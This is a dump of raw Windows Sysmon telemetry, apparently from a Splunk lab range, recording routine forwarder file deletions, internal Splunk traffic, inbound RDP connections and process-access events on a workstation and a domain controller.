SERVICEtcpfalsefalse181.214.206.115-51754-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:32.453{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=CB63556AFA47AA6485A7F20EC938ACF4,SHA256=22945093BB9AAB07EFB3CEA35AB9765E7CE0CD57683A56EFC489E4861F3ACD7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:32.234{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D243157EA9C3B9BC5605C0A76CEBB82,SHA256=B35772D56269C459F97D44FB766A21B3ED6B32E9472244FBB8D8699E3BCE3ADE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:33.969{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F489F1C8A451DBE8314B84629DB83A6,SHA256=D93F6A4568F4DE2C5C1951C952FB0E8E289700500A64F26D1683230FA969C0A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:33.745{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1097DB26BDBE923C40298564DC7C976,SHA256=08ACD43FFB59A02C14B72547AD86EE621ABED1AEA012E2CEB5F12B4CCDCECF85,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:30.621{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com57134-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:33.453{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=228256D54BC945B0EC9E5E23D1254E83,SHA256=A8FF15F1821462CCDC36483D2207C5C62E2D7B4F6BC3AAFD28610C1EA8CCEF9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:34.764{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=341F1C64E9BF4C50B4ACCF16C518A300,SHA256=86E2D9C363030248776408E50023D504D03B75BC2C09CB2CAAD43C1F4DE5738B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:34.984{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7286C7E7297752EE7312AB00B87F79,SHA256=9F5D9BBDE3FF7BE94D982445F804C2289728BF50DF7BE114268FDE3AF7E8167C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:35.984{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8972DCA17FDD23D81306B8D3DFB10172,SHA256=65F0F74B100FEC63A42589C9FE136EC763D1A9F8B9483B1F28DD0E9FB0AC88A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:35.779{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57063B2E219F7AB2A3ECCF835C4AE246,SHA256=0C92741988C52311F5B46C6B584E7C0160607F7B7662EE60B570597E00917612,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:32.784{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59238-false10.0.1.12-8000- 354300x8000000000000000976151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:32.241{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-45888-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:36.780{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9E219F527B00CB1292E723D2E0F8C4,SHA256=ECD35747BE2B2861C19B690AE7920A481FD6A9822D3CC270588B051D3F2DCC76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:36.363{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:37.828{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C956856ED7599B1B9B96B08D8FF1FA06,SHA256=146535367DA59462823C3BAD2C0110E97B1771F3FED2E0204E5C9B779D34068A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.890{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87F9-6151-7279-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-87F9-6151-7279-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.875{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87F9-6151-7279-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.860{69CF5F33-87F9-6151-7279-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.265{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EC625471CA9AE903AB58883E4E84708,SHA256=BE098F71950FDB59C5753727214F967416A3DCB187F9D03F28B5BE8C077E3EBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:37.000{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880B5D76A9B8C97DE74B9E362AB1C653,SHA256=1A68A45F3072D87556C0C1772B0BE55FFD07816F794A077E5ED2437EBE0B8B54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:37.681{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0151824DA34C4F6BFD56F5858188C476,SHA256=A8E24EE9E3FA1B7AA7C609643623BB5FBA987D0F766C65B63D3D54054D22510A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:37.681{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93030110D538C02AFEA7095DF3D62D2B,SHA256=33205A57AE6193B8FA57976B2545318994A6184DD09406B36817F11988B735A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:38.846{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4F5FD83B86895EDBDB438BF669F6E58,SHA256=3A139763A0B314AE920970E738F6B05589A922763D83E595A34EB31A0A2B72B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:38.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAF5328FEA2FE7450F4998E932FECF76,SHA256=2746508CF2621929DDDA232500D53740067DF3A32EDD11074B6068B9FCB8550A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:36.067{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-61206-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:36.033{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49197-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001047592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:35.823{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50101-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:35.770{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49196-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:39.912{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60A522C90FEB45C2F61A4CF548B53315,SHA256=C34BF1260F2171CA90CF0DB18637F0F067FE35988722178123FBD104AB0A525B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:39.078{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A1F6D879324F585FFC965DF3BDCB801,SHA256=3B5D758C657B9C1E2F3E4ABF3A7B154AAB3C91536556BCED642E70D75A18BEC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:39.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEC9257871CD52D846463C61E909CEE8,SHA256=189A3FADB1C1D4195C4159BD3AB2C19CADE29F7FF28F23FBFCCF3E25720B848F,IMPHASH=00000000000000000000000000000000falsetrue 